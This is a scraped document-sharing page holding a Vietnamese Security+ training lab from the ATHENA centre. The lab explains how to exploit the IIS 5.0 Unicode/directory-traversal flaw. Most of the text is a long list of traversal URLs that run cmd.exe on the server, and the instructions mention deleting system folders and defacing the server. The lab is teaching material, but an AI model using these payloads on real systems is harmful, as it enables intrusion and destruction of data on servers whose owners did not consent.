Collocation thường gặp trong đề thi THPT Quốc gia.pdf
ngochaavk33a
 
Ethical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptx
Ethical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptxEthical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptx
Ethical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptx
TANMAYJAIN511570
 
Program Your Destiny eBook - Destiny University.pdf
Program Your Destiny eBook - Destiny University.pdfProgram Your Destiny eBook - Destiny University.pdf
Program Your Destiny eBook - Destiny University.pdf
Michael Herlache, MBA
 
CHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docx
CHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docxCHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docx
CHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docx
ngochaavk33a
 
ÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docx
ÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docxÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docx
ÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docx
ngochaavk33a
 

Recently uploaded (7)

SOCIOLOGY PPT. SOCIAL SECURITY POWER POINT
SOCIOLOGY PPT. SOCIAL SECURITY POWER POINTSOCIOLOGY PPT. SOCIAL SECURITY POWER POINT
SOCIOLOGY PPT. SOCIAL SECURITY POWER POINT
 
UNIVERSAL HUMAN VALUES- Harmony in the Nature
UNIVERSAL HUMAN VALUES- Harmony in the NatureUNIVERSAL HUMAN VALUES- Harmony in the Nature
UNIVERSAL HUMAN VALUES- Harmony in the Nature
 
Collocation thường gặp trong đề thi THPT Quốc gia.pdf
Collocation thường gặp trong đề thi THPT Quốc gia.pdfCollocation thường gặp trong đề thi THPT Quốc gia.pdf
Collocation thường gặp trong đề thi THPT Quốc gia.pdf
 
Ethical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptx
Ethical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptxEthical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptx
Ethical_dilemmas_MDI_Gurgaon-Business Ethics Case 1.pptx
 
Program Your Destiny eBook - Destiny University.pdf
Program Your Destiny eBook - Destiny University.pdfProgram Your Destiny eBook - Destiny University.pdf
Program Your Destiny eBook - Destiny University.pdf
 
CHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docx
CHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docxCHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docx
CHUYÊN ĐỀ READING ÔN THI HSG THPT HAY.docx
 
ÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docx
ÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docxÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docx
ÔN TẬP CỤM THÀNH NGỮ TIẾNG ANH CỰC HAY.docx
 

Lab security+baiso7 tancong iis5

  • 1. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 42 Bài 7: TẤN CÔNG DỰA TRÊN LỖI IIS5.0 1. Giới thiệu: Cách tấn công này dựa trên lỗi lập trình của hệ thống chạy web server của Microsoft Windows IIS 5.0. Lỗi này đã được Microsoft khắc phục trong các phiên bản về sau. 2. Các bước thực hiện như sau: Böôùc 1: Để thực hiện bài lap này cần phải có một server cài đặt hệ điều hành windows server 2000 và IIS 5.0 Ñaàu tieân ta caàn xaùc ñònh ñòa chæ IP cuûa web laø gì? Baèng caùch vaøo start -> run -> cmd : Giaû söû muoán tìm ñòa chæ web : www.daihocyduoc.edu.vn ta nhaäp: C:>ping www.daihocyduoc.edu.vn hay C:>nslookup www.daihocyduoc.edu.vn
  • 2. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 43 ta seõ nhaän ñöôïc ñòa chæ IP cuûa website:www.daihocyduoc.edu.vn giaû söû laø:192.168.1.34 Böôùc 2: Môû IE treân thanh address nhaäp 1 doøng leänh khai thaùc loãi IIS vaøo (raát nhieàu loãi seõ ñöôïc lieät keâ ôû cuoái baøi vieát) Sau doù ta coù theå thöïc hieän caùc thao taùc nhö ñang thöïc hieän treân cmd baèng caùch thay ñoåi caùc leänh ôû cuoái . Ví duï: …………………………………………………/c+md+test+c: ñeå taïo folder test.
  • 3. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 44 ………………………………………………../c+cd+winnt+c:vaøo folder winnt. …………………………………………………………………………………………………………………………………………………Vaäy laø ta coù theå delete caùc folder chính nhö winnt , inetpub………khieán cho web server bò treo vaø neáu keû taán coâng coù aùc yù thì se deface luoân caû operating system. Böôùc 3:Ñaây laø 1 soá loãi phoå bieán treân web server söû duïng IIS5.0. Một số Url'slỗi mẫu: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir +c: /cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir +c: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
  • 4. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 45 /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: /scripts/root.exe?/c+dir+c: /scripts/eyehack.exe?/c+dir+c: /scripts/sensepost.exe?/c+dir+c: /iisadmpwd/root.exe?/c+dir+c: /iisadmpwd/eyehack.exe?/c+dir+c: /iisadmpwd/sensepost.exe?/c+dir+c: /cgi-bin/root.exe?/c+dir+c: /cgi-bin/eyehack.exe?/c+dir+c: /cgi-bin/sensepost.exe?/c+dir+c: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c: /scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+d ir+c: /scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir +c:
  • 5. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 46 /scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+ dir+c: /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c +dir+c: /_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d ir+c: /_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c +dir+c: /iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir +c: /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe? /c+dir+c: 6 /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c +dir+c: /iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe ?/c+dir+c: /cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /cgi- bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c : /cgi- bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: /cgi-
  • 6. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 47 bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+ c: /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: /msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+d ir+c: /msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir +c: /msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+ dir+c: /_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c +dir+c: /_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d ir+c: /_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c +dir+c: /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c +dir+c:
  • 7. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 48 /samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d ir+c: /samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c +dir+c: /adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir +c: /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe? /c+dir+c: /adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c +dir+c: /adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe ?/c+dir+c: /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c +dir+c: /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c md.exe?/c+dir+c: /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c md.exe?/c+dir+c: /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/ c+dir+c: /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex e?/c+dir+c: /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3 2/cmd.exe?/c+dir+c: /cgi- bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.e
  • 8. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 49 x?/c+dir+c: /cgi- bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir +c: /msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cm d.exe?/c+dir+c: /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/ c+dir+c: /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c md.exe?/c+dir+c: /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/ c+dir+c: /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c md.exe?/c+dir+c: /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex e?/c+dir+c: 7 /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3 2/cmd.exe?/c+dir+c: /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+di r+c: /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system
  • 9. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 50 32/cmd.exe?/c+dir+c: /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../ winnt/system32/cmd.e xe?/c+dir+c: /cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+ dir+c: /msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: /msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+ dir+c: /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm d.exe?/c+dir+c: /cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe ?/c+dir+c: /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+d
  • 10. 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 51 ir+c: /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe ?/c+dir+c: /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: /cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: